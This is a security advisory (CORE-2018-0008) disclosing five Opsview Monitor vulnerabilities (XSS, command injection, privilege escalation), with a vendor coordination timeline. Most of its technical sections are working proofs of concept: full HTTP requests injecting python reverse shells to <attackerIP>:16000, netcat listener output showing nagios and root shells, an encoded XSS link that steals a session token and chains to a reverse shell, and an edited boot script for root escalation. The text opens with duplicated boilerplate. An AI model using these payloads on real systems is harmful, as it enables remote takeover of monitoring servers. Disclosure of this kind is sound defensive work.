across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Opsview Monitor Multiple Vulnerabilities 1. **Advisory Information** Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145 3. **Vulnerability Description** Opsview's website states that: Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more. 4. **Vulnerable Packages** . Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2 Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1 In addition, Opsview published the following release notes: . https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new 6. **Credits** These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance. 7.1. The following proof of concept demonstrates the vulnerability: /----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/ 7.2. The following proof of concept demonstrates the vulnerability: /----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close [{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/ The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. Excerpt of the source code showing the injected script tag: /----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/ 7.3. **Notification abuse leading to remote command execution** [CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges. The following proof of concept executes a reverse shell: /----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close {"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/ /----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/ Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell. In order to perform the attack, consider the following: . API's sensitive actions require a 'restToken' to be processed. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login. The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator: /----- https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/ Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell. 7.4. **Rancid test connection functionality abuse leading to command execution** [CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter. The following proof of concept executes a reverse shell: /----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2 -----/ /----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/ 7.5. **Script modification could allow local privilege escalation** [CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges. The following excerpt shows the vulnerable code: /----- /etc/init.d/opsview-reporting-module: /opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi DAEMON=/opt/opsview/jasper/bin/rc.jasperserver test -x $DAEMON || exit 0 # Switch to opsview user if run as root id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/ The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group. /----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/ Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted. The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges: /----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;; esac shift done -----/ /----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566) # id uid=0(root) gid=0(root) groups=0(root) -----/ 8. **Report Timeline** 2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published. 9. **References** [1] https://www.opsview.com/solutions 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/